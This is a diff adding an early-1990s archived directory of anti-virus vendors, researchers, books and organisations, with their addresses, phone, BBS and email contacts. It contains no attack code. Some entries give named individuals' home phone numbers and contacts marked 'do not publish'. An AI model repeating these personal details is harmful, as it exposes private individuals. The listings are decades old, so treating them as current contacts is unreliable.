detection/protection/disinfection + +G4 Software +800-486-9552 +fax: 310-536-9796 +Virotect + +Gee Wiz Software Company +c/o Mrs. Janey Huie +10 Manton Avenue +East Brunswick, NJ 08816 +USA +Dprotect-Anti-Trojan Software + +Gilmore Systems +P.O. Box 3831 +Beverly Hills, CA 90212-0831 +U.S.A. 
+Voice: (213) 275-8006 +Data: (213) 276-5263 (920908 area now 310, connects to fax) +FICHECK/MFICHECK change detection software +post box defunct 920810 (company too?) + +Gavin Godby +Programmer/Analyst +Rm 3-10 Ag. For. Centre +University of Alberta +Edmonton, Alberta +CANADA T6G 2P5 +email: BITNET: USERGAVN@UALTAMTS + Internet: USERGAVN@mts.ucs.ualberta.ca + SUZY +ANTIVIR boot sector change detection/replacement + +Ross Greenburg +Post Office Box 908 +Margaretville, New York 12455 +(Virus Acres +New Kingston, NY 12459) +914-586-2023 +(formerly Software Concepts Design +594 Third Avenue +New York, NY 10016 +212-889-6431 +BBS: 212-889-6438) +607-326-4422 +fax: 607-326-4424 +Flushot-Anti-Viral Software. +see also Microcom + +Patricia M. Hoffman +3333 Bowers Ave Suite 130 +Santa Clara, CA 95054, USA +Tel. : 1-408-988-3773 +FAX : 1-408-988-2438 +BBS : 1-408-244-0813 +75300.3005@compuserve.com +Virus Summary Document +also distributed by: +Roger Aucoin +Vacci Virus +84 Hammond Street +Waltham, MA 02154 +Voice: 1-617-893-8282 +FAX : 1-617-969-0385 + +Denny Kirk +Hyper Technologies +211 - 3030 Lincoln +Coquitlam, B. C. +604-464-8680 +Integrity +still in production, not yet available + +IBM High Integrity Computing Lab +Thomas J. Watson Research Center +P. O. Box 218 +Yorktown Heights, New York +USA 10598 +David Chess CHESS@WATSON.IBM.COM, CHESS@YKTVMV.BITNET +VIRSCAN +*Note* - customers should contact IBM rep, not HICL directly + +"Ides of March" Virus Conference (defunct?) +Richard G. Lefkon +NYU, DPMA Fin. Ind. Ch. +609 West 114th Street +New York, NY 10025 +(212) 663-2315 + +Information Systems to Increase Profits +P. O. Box 4529 +Middletown, New York 10940 +USA +800-274-3007 +Fax: 914-496-3504 +Sys Guard, Sys Guard Security Card and Virus Guardian VG-303 card + +Integrity Technologies, Inc. +1395 Main Street +Metuchen, NJ 10004 +VirALARM 2000 PC + +Intel Corp. +3065 Bowers Ave. 
+Santa Clara, CA 95051 +USA +Hillsboro, OR + 503-629-7000 +Sales: 800-538-3373 + 44-793-431-155 +BBS: 503-645-6275 + 44-793-432-955 +Fax: 800-458-6231 + 503-629-7580 + 44-793-431-166 +FaxBACK800-525-3019 + 44-793-432-509 + 503-629-7576 +Pay: 900-288-7700 ($30 per call) + 44-793-431-144 + 44-793-421-777 (French) + 44-793-421-333 (German) +LANDesk Virus Protect (formerly LANProtect 1.0) + +International Microcomputer Software Inc. (IMSI) +1938 Fourth Street +San Rafael, CA 94901 +USA +415-454-7101 +800-833-4674 +BBS 415-454-2893 +VirusCure Plus + +Computer Virus Info Group +Information Security Research Centre +Faculty of Information Technology +Queensland University of Technology +Box 2434 Brisbane 4001 AUSTRALIA +Phone: +61 7 864-2111 +Fax: +61 7 864-1507 +Wayne Boxall +boxall@fitmail.fit.qut.edu.au +boxall@qut.edu.au +864-2095 + +International Computer Virus Institute +1257 Siskiyou Boulevard, Suite 179 +Ashland, OR 97520 +USA +503-488-3237 +503-482-3284 +BBS 503-488-2251 +Eliminator anti-viral, virus simulators plus books and consulting +see also British Computer Virus Research Centre, Joe Hirst + +International Security Technology Inc. +99 Park Avenue, 11th Floor +New York, NY 10016 +212-557-0900 +fax: 212-808-5206 +(formerly +515 Madison Avenue, #3200 +New York, NY 10022 +USA +212-288-3101 +fax: 212-644-6828) +Virus-Pro +PC Virus Control Handbook, Jacobsen, 1990 +Using McAfee Associates Software for Safe Computing, Jacobsen, 1990 + +Interpath Corporation +Cylene-4-Anti-Viral software, no longer produced +defunct, cf McAfee + +IPE Corporation Ltd/International Data Security +9-10 Alfred Place +London WC1E 7EB +England, +tel. +44 71 436 2244 +fax: +44 71 580 1466 +(G. McLeod?) +"Secure Times" periodical + +IP Technologies +3710 S. 
Susan St., #100 +Santa Ana, CA 92704 +USA +714-545-9001 +fax: 714-549-5075 +Virus Guard + +IRIS +7a Pinchas Rosen Street +Tel Aviv 69512, Israel +Virus-Free (cf Fink, Techmar) + +Lee Jackson +4255 Rosehill Rd #2 +Garland, TX 75043 +USA +Author, The Hack Report +Moderator, FidoNet SHAREWRE and WARNINGS echos +Internet: ljackson@BIX.com, FidoNet Node 1:124/4007 (Pvt) + +Johnson Computer Systems, Inc. +20 Dinwiddie Place +Newport News, Virginia 23602 +(804) 872-9583 +PCVAULT software write protection + +Chris Johnson +Gatekeeper and Gatekeeper Aid (Mac) + +KWARE Inc. +2952 Timberwood Way +Herndon, VA 22071 +dist. by REB Management Consultants Inc. +8518 Spartan Road +Fairfax, VA 22031 +703-560-2076 +SEER (MS-DOS) + +Laboratory of Computer Virology +Bulgarian Academy of Sciences +ul. Acad. G. Bontchev, bl. 8, rm. 104 +1113, Sofia, Bulgaria +Phone: +359-2-719212 +BBS: +359-2-737484 (Virus Busters) +FidoNet: 2:359/110 +EUnet: user@virbus.uucp + where user is one of the following: + postmaster - the general account + eugene - the boss + assen - the communications guy + shu \ + ivan ) - the programmers + michail / + katrin - public relations + +Lasertrieve, Inc. +395 Main Street +Metuchen, NJ 08840 +USA +Viralarm-Anti-Viral Software +moved (defunct?) + +LeeMah DataCom Security Corp. +3948 Trust Way +Hayward, CA 94545 +USA +415-786-0790 + +Stephen A. Lentz +(602) 274-8001 +working with Hal Becker (602) 841-0962 +U.S. patent 4,975,950 +"System and Method of Protecting Integrity of Computer Data and Software" + +Leprechaun Software Pty Ltd +PO Box 134 +Lutwyche Queensland 4003 +Australia +Lindsay Hough +61 7 2524037 +Leprechaun International +2284 Pine Warbler Way +Marietta Georgia 30062 USA +404 971 8900 +fax 404 971 8988 +800-521-8849 +Roger Thompson home 404-509-7314 +Wanikas Software Inc. +Suite 4, 60 St. Claire Ave. W. +Toronto, Ont. 
+M4V 1M7 +(416) 920-5006 +Fax: (416) 920-0778 +Virus Buster + +Levin and Associates +PO Box 14546 +Philadelphia, PA +19115 +215-333-8274 +Checkup change detection (MS-DOS) + +Roger Lindberg +Cyklonvagen 3 +451 60 Uddevalla +SWEDEN +FLIST and FCHECK (Atari) + +Look Software +Cliff Livingstone +P. O. Box 78072, Cityview +Nepean, Ontario K2G 5W2 +613-837-2151 +800-267-0778 +fax: 613-837-5572 +VirusAlert! (contains F-Prot, cf Frisk) + +Paul Mace Software +400 Williamson Way +Ashland, OR 97520 +USA +tech support 503-488-0224 +fax: 503-488-1549 +sold and supported through: +Fifth Generation Systems, Inc. +10049 N. Reiger Rd. +Baton Rouge, Louisiana +USA 70809 +800-677-1848 +1-800-873-4384 sales and info +504-291-7283 tech support +504-291-7221 admin +telecopier: 504-292-4465 +Mace Vaccine-Anti-viral software. + +Magna +2540 North First Street, Suite 302 +San Jose, CA 95131 +800-755-MAGNA +408-433-5467 +Empower II (Mac) + +Mainstay +5311-B Derry Avenue +Agoura Hills, CA 91301 +Antitoxin (Mac) + +Management Advisors Publications +P. O. Box 81151 +Wellesley Hills, MA 02181 +USA +617-235-2895 +Computer Viruses: Realities, Myths and Safeguards + +Maze Computer Group +PO Box 515 +Lenon Hill Station +(New York, NY 10021?) +V*Screen + +McAfee Associates +3350 Scott Blvd, Bldg 14 +Santa Clara, California +95054-3107 USA +Voice (408) 988-3832 +FAX (408) 970-9727 +BBS (408) 988-4004 +CompuServe ID: 76702,1714 or GO MCAFEE +Viruscan suite of programs +Morgan Schweers - mrs@netcom.com (personal account, do not publish) +Aryeh Goretsky,Tech Support +aryehg@darkside.com +mcafee@netcom.com +aryeh@mcafee.com +support@mcafee.com +mcafee.com is IP 192.187.128.1 + +Mike McCune +MMCCUNE@SCTNVE.... +FTP from mibsrv.mib.eng.ua.edu in pub/ibm-antivirus/innoc.zip +INNOC Boot Virus Immunizer, boot sector overlay renders non-booting + +McGraw-Hill Ryerson/Osborne +300 Water Street +Whitby, Ontario +L1N 9B6 +416-430-5000 +416-430-5047 Rita Bisram, Marketing +fax: 416-430-5020 +or +2600 Tenth St. 
+Berkeley, CA 94710 +USA +415-548-2805 +800-227-0900 +The Computer Virus Handbook, Richard Levin, 1990, 0-07-881647-5 + +Microcraft, Inc. +PO Box 1652 +Richmond, IN 47374 +Vir-X + +Micronyx Inc +1901 N. Central Expressway, Suite 400 +Richardson, TX +USA 75080 +800-634-8786 +214-690-0595 +214-644-1344 tech support +fax: 214-690-1733 +7 Canon Harnett Court +Warren Farm Office Village +Stratford Road, Wolverton Mill +Milton Keynes, England MK12 5NF +0908-221247 +Fax: 0908-223416 +SAFE (Secure Access For the Enterprise) + +Microseeds Publishing, Inc. +5801 Benjamin Center Drive, Suite 103 +Tampa, Florida 33634 +USA +813-882-8635 +authors Frederic Miserey and Jean-Michel Decombe from France +Rival Mac antiviral + +Miller Freeman/CSI +600 Harrison Street +San Francisco, CA 94107 +415-397-1881 +415-905-2470 +Computer Security Handbook +CSI Black Book +The PC virus control handbook, Jacobson, 1990 + +The Ministry of International Trade and Industry +Computer Virus Office +IPA(Information-Technology Promotion Agency, Japan) +Tel:03-3437-2301 +Fax:03-3437-5386 +3-1-38, Shibakoen, Minato-ku, Tokyo, 105 JAPAN + +Anthony Naggs +P O Box 1080, Peacehaven +East Sussex BN10 8PZ +Great Britain +Phone: +44 273 589701 +Email: (c/o Univ of Brighton) amn@vms.brighton.ac.uk or xa329@city.ac.uk +AV software due spring of 1993 + +National Computer Security Assn Jinbu (NCSA) +Michel E. Kabay, Ph.D., Director of Education +P.O. Box 509 Westmount +Montreal, Quebec +H3Z 2T6 CANADA + + +(514) 931-6187 +fax 514-931-0878 +75300.3232@compuserve.com +franchise security organization + +National Institute of Standards and Technology (NIST) +Computer Security Division +A-216 Technology +Gaithersburg, MD 20899 USA +301-975-3359 +Fax: 301-590-0932 +BBS: 301-948-5717 +EMail: csrc@nist.gov +Personnel and email addresses: + Dennis D. Steinauer, DSteinauer@nist.gov + Lawrence Bassham, LBassham@nist.gov + W.T. 
Polk, WPolk@nist.gov + John Wack, JWack@nist.gov + Marianne Swanson, marianne_swanson@nist.gov (BBS Sysop) + +Nemesis +Am Rain 8b +D-7512 Rheinstetten 2 +Karlsruhe, Germany +Sparkasse Ettlingen +BLZ 660 512 20 +Kto. 135 66 33 +Virus Help Service +49-721-821355 Sysop: Robert Hoerner Fido 2:241/7518 +Virus Research Center +49-721-28780 Sysop: Mirko Ketterer Cosysop : Christian Sy Fido 2:241/7516 +Nemesis activity monitor + +NetLink Online Communications +San Diego CA +Kevin Marcus +(619) 435-6181 +BBS: (619)/457-1836 +tck@netlink.cts.com + +Netpro Computing +Scottsdale, AR +602-998-5008 +800-998-5090 +ScanMaster by McAfee, cf McAfee, Parsons et al + +Network-1 Inc. +PO Box 8370 +L.I.C., NY 11101 +800-NETWRK1 +718-932-7599 +Fax: 718-545-3754 +Check-4-Virus for VMS $495. + +NetZ Computing Ltd. +Israel +V-Care Antivirus Expert System (PC) +marketed in the US by Sela Consultants Corporation + +Nighthawk Electronics Ltd. +P. O. Box 44 +Saffron Walden +Essex CB11 3ND +UK +(0799) 40881 +Fax: (0799) 41713 + +Norman Defense Data Systems Inc. +2775-B Hartland Road +Falls Church, VA 22043 +703-573-8802 +Fax: 703-573-3919 +BBS: 703-573-8990 +norman@digex.com +formerly +International Computer Security Association (ICSA) +National Computer Security Association (NCSA) +Suite 33, 5435 Connecticut Avenue NW +Washington, DC 20015 +USA +David Stang +800-488-4595 +202-364-8252 +fax: 202-364-1320 +BBS: 202-364-0644 +75300.3104@CompuServe.COM (Charles Rutstein) +75300.2673@CompuServe.COM (David Stang) +Virus News and Reviews journal +"Executive Guide to Computer Viruses" ($24.95) and various publications +Programs - Virus Analysis Toolbox, ViruSchool and V-Base + +John Norstad +Academic Computing and Network Services +Northwestern University +2129 Sheridan Road +Evanston, IL 60208 USA +j-norstad@nwu.edu +Disinfectant for Mac - archived at ftp.acns.nwu.edu (129.105.113.52) + +Northbank Corporation +Richmond, VA +Guard Card + +Ontrack Computer Systems Inc. +6321 Bury Dr. 
+Eden Prairie, MN 55346 +USA +612-937-1107 +Steve Hill +Head of Anti-Virus research +Bob Bower, sales, ext. 234 +1-800-752-1333 +Ciprico, Inc. Plymouth, MN 55441 +samurai@cipric.mn.org (Steve A. Hill) +cynic!van-bc!uunet!rosevax!cipric!samurai +Dr. Solomon's Antivirus Toolkit + +Orion Microsystems +PO Box 128 +Pierrefords, Quebec +H9H 4K8 +514-626-9234 +Ntivirus + +Lars-Erik 0sterud +0kriveien 39 +N-1349 Rykkinn +Norway ++47-2-131571 +ABK-BBS +47-2-132659 +larserio@ifi.uio.no (User unknown) +Protect6 (Atari) + +Oxford University Press +70 Wynford Drive +Don Mills, Ontario +M3C 1J9 +or +200 Madison Avenue +New York, NY 10016 +USA +212-679-7300 +Managing Computer Viruses, Luow/Duffy, 1992 + +Panda Systems +801 Wilson Road +Wimington, DE 19803 +USA +800-727-2632 +(302)764-4722 +Dr. Panda Utilities, BEARTRAP, Panda Pro - Anti-Viral Software +PSKane@Dockmaster.ncsc.mil or 0003607248@mcimail.com + +PanSoft Software & Support, +P.O. Box 12-292, +Christchurch, +NEW ZEALAND. +author Peter Johnson, +52A Dyers Pass Road, +Christchurch, 2, +NEW ZEALAND +phone (064) 3 3322-727 +IMMUNISE & SCANBOOT + +Parsons Technology +375 Collins Road NE +Cedar Rapids, IA 52402 +One Parsons Dr. +PO Box 100 +Hiawatha, IA 52233-0100 +USA +800-223-6925 +319-395-9626 +Virucide + +PC Guardian Security Products +118 Alto Street +(1133 E. Francisco Blvd., Suite D?) +San Rafael, CA 94901 +Phone: 415-459-0190 +Fax: 415-459-1162 +Noah Groth, President +Dan Marley 800-288-8126 +Brett Fhuere 800-882-7766 +Virus Prevention Plus, Data Security Plus, cf Frisk + +PC Information Group +1126 East Broadway +Winona, MN 55987 +800-321-8285 or 507-452-2824 +SysLaw 2nd ed., Lance Rose (elrose@well.sf.ca.us) and Jonathon Wallace, 1992 + +Penn State University +Penn State Virus Committee +Chair - Gerry Santoro - 814-863-7896 + +A. 
Padgett Peterson, Computer Network Security +Orlando +POB 1203 +Windermere, FLA, 34786 +(407)352-6007 +Fax: (407)352-6027 +cynic!van-bc!uvs1.orl.mmc.com!tccslr.dnet!padgett +padgett%tccslr.dnet@uvs1.orl.mmc.com [host unknown] +padgett%tccslr.dnet%mmc.com@cunyvm.cuny.edu +cynic!van-bc!uvs1.orl.mmc.com!tccslr.dnet!padgett@dinl.den.mmc.com +uvs1.orl.mms.com!padgett%tccslr.dnet@cs.utexas.edu +* (407)356-4054, 6384 work, (407)356-2010 FAX (MM, do not publish) * +DISKSECURE, SafeMBR, FixMBR + +PickAxe Media +193 Bath Rd +Kirawee 2232 +N.S.W. +Australia +Bruce Hodge ccdbh@cc.newcastle.edu.au +"Rid me of this Virus" $15.00 + +Pittsburgh Computer Virus Specialists +PO Box 19026 +Pittsburgh, PA 15213 +BBS: 412/481-5302 +Tele: 412/481-3505 +FAX: 412/481-8568 +AntiVirus consultation services, Subscription FAX service + +PKWare, Inc. +7545 North Port Washington Road +Glendale, WI 53217-3442 +USA +Douglas Hay 75300.730@compuserve.com +PKZIP, PKSFX-File compression utilities with encryption option + +Jonathan Potter +P.O. Box 289 +Goodwood, SA 5034 +Australia +(08) 2932788 +ZeroVirus for Amiga + +Prentice Hall, Inc./Brady +113 Sylvan Avenue +Englewood Cliffs, NJ 07632 +(515) 284-6751 +FAX (515) 284-2607 +11711 N. College Ave. +Carmel, IN 46032-9903 +800-428-5331 +Computer Viruses and anti-virus warfare, Hruska, 1990 + +Prime Factors +1470 East 20th Avenue +Eugene, OR 97403 +USA +VI-Raid Anti-Viral Software + +Protech Services +P. O. Box 325 +Fresh Meadows, NY 11365 +718-321-7908 +fax: 718-961-8612 +IDE Stealth Card + +PYRAMID Development Corp +800-759-3000 +20 Hurlbut Street, +West Hartford, CT 06110 (moved to:) +(Mergent?) +70 Inwood Rd +Rocky Hill, CT 06067-3441 +203-953-9832 +Fax: 203-953-3435 +PC/DACS retail $249.00. + +Quaid Software Ltd. +45 Charles Street East +Toronto, ON M4Y 1S2 +416-961-8243 +Antidote-Anti-Viral Software +product not available + +Remote Technology +3612 Cleveland Ave. +St. 
Louis, MO 63110 +Immunize + +RG Software Systems Inc +6900 East Camelback Road +Suite 630 +Scottsdale AZ 85251 ++1 602 423 8000 +FAX (602) 423-8389 +BBS (602) 970-6901 +Ray Glath <76304.1407@CompuServe.COM> +Vi-Spy, Virus Bulletin subscriptions (PC Tracker) + +S&S International Ltd. +Berkley Court, Mill Street +Berkhamsted, Herts. HP2 4HB +England +Phone: +44 442 877 877 +Fax: +44 442 877 882 +BBS: +44 494 724 946 + 442 877 883 +E-Mail: Dr. Alan Solomon +sands@cix.compulink.co.uk +Dr. Solomon's Anti-Virus Toolkit +Vendor: Markt & Technik Software Partners GmbH +Hans-Pinsel_Strasse 9b +8013 Haar +Germany +Phone: +49 89 46 09 00 92 +Fax: +49 89 46 09 00 95 +vendor: Ontrack Computer Systems +6321 Bury Drive +Eden Prairie, MN 55346 +USA +(800) 752-1333 +(612) 937-1107 +fax: (612) 937-5815 + +SafetyNet +14 Tower Drive +East Hanover, New Jersey +908-851-0188 +800-851-0188 +fax: 908-276-6575 +safetynet@attmail.com +Drive-In Antivirus, Stoplight, VirusNet (contains F-Prot, cf Frisk) + +St. Martin's Press +175 Fifth Ave. +New York, NY 10010 +USA + Computer Viruses, Worms, Data Diddlers, Killer Programs and Other Threats + to Your System: what they are, how they work and how to defend your + PC, Mac or mainframe, John McAfee and Colin Hayes, 1989, 0-312-02889-X + +Luis Bernardo Chicaiza Sandoval +Phone: (91)2 02 23 78 +Universidad de los Andes Bogota, Colombia +mail address: +Compucilina US$70, adds self check module +review copies not available + +Tommy Pedersen +SECTRA +Teknikringen 2 +S-583 30 Linkoping +SWEDEN +Telephone: +46 13 235214 + +46 13 235200 +FAX: +46 13 212185 +Telephone: +46 13 282369 + FAX: +46 13 289282 +tommyp@sectra.se +tommyp@isy.liu.se +TCell unix change checker + +Security Dynamics Inc. +Cambridge, MA +USA +617 547 7820 +mail undeliverable +dial in security systems + +Securkey Systems Inc. +1674 Eglington Ave. 
West +Toronto, Ontario +M6E 2H3 +(416) 784-2883 +fax: (416) 784-0338 +telecommunications encryption interface, DES/MAC keys + +Sela Consultants Corp. +InVircible + +Alexander Shehovtsov +(044) 266-70-28 (9:00 - 18:00 Kiev, Ukraine) voice +als@vl.ts.kiev.ua +FidoNet 2:463/30.5 or 2:463/34.4 +RLOCK software write protection + +Jeffrey S. Shulman +PO Box 50 +Ridgefield, CT 06877 +VirusBlockade, VirusDetective (Mac) + + +Silver Oak Systems +IronClad + +Simon & Shuster +330 Steelcase Road +Markham, Ontario +L3R 2M1 +or +15 Columbus Circle +New York, NY 10023 +Computer Viruses and anti-virus warfare, Hruska, 1990 +Cyberpunk, Hafner/Markoff, 1991 + +Softhansa GmbH +AntiVirus 1.0E (Mac) + +Software Directions +1572 Sussex Turnpike +Randolph, NJ 07869 +201-584-8466 +SoftSafe + +Software Systems +2300 Computer Avenue, Suite 15 +Willow Grove, PA 19090 +Disk Watcher + +Sophco +P.O. Box 7430 +Boulder, CO 80306 +USA +Vaccinate-Anti-Viral Software + +Sophos Limited/Virus Bulletin Ltd. +21 The Quadrant +Abingdon Science Park +Abingdon, Oxfordshire OX14 3YS +UK ++44-235-559933 ++44-235-555139 +fax: (0235) 559935 +oxcompl@vax.ox.ac.uk Edward Wilding or Richard Ford +virusbtn@vax.ox.ac.uk +Vaccine Anti-Viral Software, also Virus Bulletin +"Survivor's Guide to Computer Viruses", 1993, 0-9522114-0-8, UK#19.95 + +Springer-Verlag +175 Fifth Ave. +New York, NY 10010 +212-460-1500 +800-777-4643 +or +8 Alexandra Road +London SW19 7JZ +44-81-947 5885 +"A Pathology of Computer Viruses" by David Ferbrache of the UK Defense Research +Agency, 1992, ISBN 3-540-19610-2 and 0-387-19610-2, $39.50 300 pages +"PC Viruses: Detection, Analysis and Cure", Solomon, Alan, 1991 + +Star Technologies (UK) Ltd +Passfield Enterprise Centre +Liphook +Hants +GU30 7SB +Greg Watson +Internet : gw@startech.demon.co.uk +Voice : 0428 751091 +Fax : 0428 751117 +UNIX virus checker (Intel/BIOS BSIs only?) + +Stiller Research +2625 Ridgeway St. 
+Tallahassee, FL 32310 +904-575-7884 (fax also attached) +Advanced Support Group (ASG) at 1-900-88-HELP8 (1-900-884-3578) +or 314-256-3130 +72571.3352@compuserve.com +Runway BBS (215) 623-6203 2400 baud + (215) 623-4897 HST + (215) 623-6845 V.32 +Integrity Master change detection software + +Peter Stuer +Kauwlei 21 +B-2550 Kontich +Belgium +Peter.Stuer@p7.f603.n292.z2.FidoNet.Org +BootX (Amiga) + +Swarthmore Software Systems +526 Walnut Lane +Swarthmore, PA 19081 +USA +Bombsquad, Check-4-Bomb Anti-Trojan software + +Sybex +2021 Clallenger Dr., #100 +Alameda, CA 94501 +USA +Computer Virus Protection Handbook, Colin Hayes, 1990, 0-89588-696-0 + +Sydex BBS +Eugene, Oregon +USA +503-683-1385 +Prune v2.1 utility + +Symantec/Peter Norton +10201 Torre Avenue +Cupertino, CA 95014 +USA +408-253-9600 +800-343-4714 +800-441-7234 +408-252-3570 +416-923-1033 +Technical Support: 213-319-2020 +Virus Newsline: 408-252-3993 +Virus Faxline: 213-575-5018 +BBS: 408-973-9598 +Fax: 408-253-4092 and 252-4694 +Telex: 9103808778 +Compuserve: NORUTL +Jimmy Kuo cjkuo@ccmail.norton.com +Norton AntiVirus and Norton Utilites +SAM (Symantec AntiVirus for Macintosh) + +TAB/Windcrest Books +Blue Ridge Summit, PA 17294-0850 +USA +Computer Viruses, Jonathon L. Mayo, 1989, 0-8306-3382-0 + +Tacoma Software Systems +7526 John Dower Road W. +Tacoma, WA 98467 +VIRSTOP 1.05 + +T.C.P. Techmar Computer Products +97 - 77 Queens Blvd. +Rego Park, NY 11374 +USA +(moved, no forwarding address 920814) +800-922-0015 (not available from Canada) +718-275-6800 +fax: 718-520-0170 +70761.2721@Compuserve.com + IRIS Antivirus (cf Fink), Antivirus Plus (purported "AI vaccine"), VirAway + scanner + +Steve Tibbett +613-731-5316 +BBS 613-731-3419 +s.tibbett on BIX +VirusX for Amiga + +Thecia Systems Ltd, +Lasada House, +BRIGHTON +BN1 4ED +United Kingdom +Tel: +44 273 623500 +Fax: +44 273 623700 +Eliminator +see also ICVI, BCVRC +no longer at this address + +Harry Thijssen +P.O. 
Box 662 +6400 AR Heerlen +The Netherlands +INFOdesk The Hague FIDO 2:512/2.7 +31-70-3898822 +HTScan scanner + +Thuna Technologies +Upgrades, Etc. +2432-A Palma Drive +Ventura, Ca. 93003-5732 +Sales Department: (805)650-2030 + (800)955-3527 +Acounting: (805)650-2046 +Customer Service/Returns(805)650-2042 +Technical Support: (805)650-2044 +FAX: (805)650-6515 +MR. BIOS + +Tomauri Inc. +30 West Beaver Creek Road, Unit 13 +Richmond Hill, Ontario +L4B 3K1 +416-886-8122 +Telecopier: 416-886-6452 +PC Guard - password protection board, also for Mac + +Transfinite Systems Company, Inc. +PO Box N, MIT Post Office +Cambridge, MA 02139 +617-969-9570 +Ft. Knox (Mac) + +Trend Micro Devices Inc. +2421 W. 205th St., #D-100 +Torrance, CA 90501 +USA +310-782-8190 +fax: 310-328-5892 +BBS: 310-320-2523 +800-228-5651 +PC-cillin - program change detection hardware/software + +Tripwire +genek@mentor.cc.purdue.edu +Tripwire UNIX security software + +University of Cincinnati +Dep't. of Computer Engineering +Mail Loc. 30 - 898 Rhodes Hall +Cincinnati, OH 45221-0030 +USA +Cryptographic Checksum-Anti-Viral software + +usrEZ +18881 Von Karman Ave., Suite 1270 +Irvine CA 92715 +714-573-2548 +ultraSECURE for Mac + +Vacci Virus +84 Hammond Street +Waltham, MA 02154 +Voice: 1-617-893-8282 +FAX : 1-617-969-0385 +distributes Hoffman Virus Summary Document, other products unknown + +Van Nostrand Reinhold +115 Fifth Ave. +New York, NY 10003 +The Computer Virus Crisis, Fites/Johston/Kratz, 1989, 0-442-28532-9 +fites@qucis.queensu.ca +Rogue Programs, edited Lance Hoffman, 1990, ISBN 0-442-00454-0 +hoffman@gwusun.gwu.edu hoffman@seas.gwu.edu + +Vancouver Institute for Research into User Security +3118 Baird Road +North Vancouver, B. C. +V7K 2G6 +604-984-4067 (Robert Slade, home) +virus research archives, seminars, vendor contact list, AV BBS list, weekly +columns, product reviews, consulting, V.I.R.U.S. Weekly, Monthly and BBS feed +(see CyberStore) + +VDS Advanced Research Group +P.O. 
Box 9393 +Baltimore, MD 21228 +(410) 247-7117 +Tarkan Yetiser tyetiser@ssw02.ab.umd.edu +Brian Seborg seborg@csrc.ncsl.nist.gov +VDS 2.1 change detector and scanner + +Frans Veldman +ESaSS B.V. +P.o. box 1380 +6501 BJ Nijmegen +The Netherlands +Tel: 31 - 80 - 787 881 +Fax: 31 - 80 - 789 186 +Data: 31 - 85 - 212 395 + (2:280/200 @fidonet) +bartjan@blade.stack.urc.tue.nl (Bartjan Wattel) +c/o Jeroen W. Pluimers +P.O. Box 266 +2170 AG Sassenheim +The Netherlands +work: +31-71-274245 9.00-17.00 CET +home: +31-2522-20908 19:00-23:00 UTC +email: jeroenp@rulfc1.LeidenUniv.nl + Jeroen_Pluimers@f256.n281.z2.fidonet.org + 100013.1443@compuserve.com +or Calmer Software Services + 361 Somerville Rd + Hornsby Heights NSW 2077, AUSTRALIA. + Ph +61 2 4821715, BBS +61 2 4821716 +or +P.O. Box 527 +Dagsboro, DE 19939 +(302) 732-3105 [voice] +(302) 732-3105 [fax] +(302) 732-6399 [BBS] +Thunderbyte Utilities, Thunderbyte card + +John Veldthuis +21 Ngatai Street +Manaia, Taranaki +New Zealand +Phone (0624) 8409 +FIDO 3:771/400.0 +johnv@tower.actrix.gen.nz +virus_checker for Amiga (archived at ab20.larc.nasa.gov) + +Viagrafix +PC Virus (video) + +A. & Z. Vidovic +Tour Panoramique +Duchere +69009 Lyon +France +Chasseur II (Atari) + +Villa Crespo Software +1725 McGovern Street +Highland Park, IL 60035 +708-433-0500 +Fax: 708-433-1485 +Failsafe Computer Guardian + +Mikael Larsson +Virus Help Centre +Box 7018 +S-81107 SANDVIKEN +SWEDEN +Phone : +46-26 100518 +Fax : +46-26 275720 +BBS : +46-26 275710 (HST) +FidoNet : 2:205/204 +VirNet : 9:461/101 +SigNet : 27:5346/108 (soon) +Email : vhc@abacus.hgs.se + +Virus News International. +Berkley court, Millstreet, Berkhamsted, Hertfordshire, HP4 2HB, +England. +Tel. +44-442-877877 + +Virus Security Institute +PSKane@dockmaster.ncsc.mil +VSI conference + +Virus Test Center, Faculty for Informatics +University of Hamburg +Schlueterstr. 70, D2000 Hamburg 13, FR Germany +Prof. Dr. 
Klaus Brunnstein, Simone Fischer-Huebner +Contact: Margit Leuschner (VTC, secretary) +Tel: (040) 4123-4158 (KB), -4175 (SFH), -4162 (ML) +Email (EAN/BITNET): brunnstein@rz.informatik.uni-hamburg.dbp.de +Computer Virus Catalog (MS-DOS, Mac, Amiga and Atari) + +VIRUS-L/comp.virus +Kenneth R. van Wyk +Moderator VIRUS-L/comp.virus +VIRUS-L submissions should go to: VIRUS-L@Lehigh.Edu +Division Chief, Operations +Center for Information Systems Security (CISS) +Defense Information Systems Agency (DISA) +krvw@Agarne.IMS.DISA.MIL + +Vision Fund +10 Spruce Lane +Ithaca, NY 14850 +Robert Woodhead +Interferon (Mac) + +Western Digital Corporation +8105 Irvine Center Drive +Irvine, CA 92716 +714-932-5000 +714-932-6250 Letty Ledbetter +Robert McCarroll, Product Manager, Systems Logic Group +714-932-7013 Terry Walker (and Robert Lee, developer) fax: 714-932-7097 +Mark Levitt fax: 714-932-7098 +Benjamin Group (marketing) +Suite 480, 100 Pacifica Ave. +Irvine, CA 92718 +714-753-0755 (Erin Jones, Sari Barnhard and Carolyn Fromm) fax: 714-753-0844 +Immunizer "concept" + +George R. Woodside +5219 San Felicaino Drive +Woodland Hills, CA 91364 +USA +(818) 348-9174 +76537.1342@compuserve.com +GEnie: G.WOODSIDE +woodside@ttidca.com (Host Unknown) or ..!{philabs|csun|psivax}!ttidca!woodside +VKILLER for Atari ST + +Woodside Technologies +474 Potrero Ave. +Sunnyvale, CA 94086 +408-733-9503 +Fortress UNIX antiviral + +Jim Wright + +Maintains and distributes list of anti-viral archive and ftp sites + +XTree Co. +4330 Santa Fe Road +(4115 Broad Street, Building 1?) +San Luis Obispo, CA 93401-7993 +USA +800-477-1587 +805-541-0604 +fax: 805-541-4762 +BBS: 805-546-9150 +75300.2266@Compuserve.com +ViruSafe - activity monitor, scanner and "bait" program, cf EliaShim + +Zortech Inc. +366 Massachusetts Ave. +Arlington, MA 02174 +Check-It + diff --git a/textfiles.com/virus/cnws2005.vir b/textfiles.com/virus/cnws2005.vir new file mode 100644 index 00000000..5f4d517a --- /dev/null 
+++ b/textfiles.com/virus/cnws2005.vir 
